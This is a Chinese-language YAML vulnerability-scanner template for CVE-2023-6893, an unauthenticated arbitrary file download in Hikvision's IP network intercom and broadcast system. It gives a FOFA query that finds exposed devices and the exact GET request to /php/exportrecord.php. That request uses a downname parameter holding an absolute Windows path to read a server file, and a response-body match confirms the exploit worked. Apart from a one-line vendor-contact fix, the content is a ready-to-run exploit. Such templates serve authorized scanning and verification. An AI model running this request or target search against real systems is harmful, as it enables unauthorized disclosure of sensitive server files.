product: 海康威视IP网络对讲广播系统
vName: 海康威视IP网络对讲广播系统 exportrecord.php任意文件下载
type: 文件下载
vID:
  - CVE-2023-6893
level: 3
vDesc: IP网络对讲广播系统在3.0.3_20201113_RELEASE(HIK)版本中存在任意文件下载漏洞，未授权的攻击者能够通过/php/exportrecord.php文件读取任意文件内容，导致服务器的敏感信息泄露
version: ''
note: ''
search:
  FOFA: app="SPON-IP网络广播系统" || icon_hash="-1830859634"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /php/exportrecord.php?downtype=10&downname=C:\ICPAS\Wnmp\WWW\php\conversion.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - header('Access-Control-Allow-origin
            logic: and